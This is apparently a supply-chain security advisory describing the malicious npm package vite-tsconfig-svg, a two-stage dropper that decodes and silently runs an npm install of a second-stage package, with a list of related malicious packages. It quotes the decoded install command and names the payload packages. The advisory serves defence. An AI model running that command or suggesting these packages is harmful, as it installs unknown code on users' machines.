vite-tsconfig-svg@1.1.4
Malicious code in vite-tsconfig-svg (npm)
Analysis
Combosquat package vite-tsconfig-svg is a two-stage dropper. Its index.js contains two base64-encoded strings: one decodes to "npm install rollup-plugin-polyfill-helper --no-save --silent --no-audit --no-fund" and the other to "rollup-plugin-polyfill-helper". When the exported getPlugin() or setPlugin() functions are called, the code atob-decodes the command, spawns a child process to silently install the second-stage package rollup-plugin-polyfill-helper from npm, then requires and executes its plugin method. The package has no repository and its sole purpose is to drop and run an unknown second-stage payload.
- analyzed by
- Leitwacht
- first seen
- Jul 31, 2026, 02:11 PM
- analyzed
- Jul 31, 2026, 02:13 PM
Related advisories
- rollup-plugin-polyfill-hold@1.0.5
- ts-poly-utls@1.2.4
- postcss-animate-css-vars@2.0.3
- log-min@1.0.13
- streak-metrics-math@1.0.1
- runtime-sentinel@1.0.2
- streak-math-metrics@1.0.0
- akamai-sensorv3@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.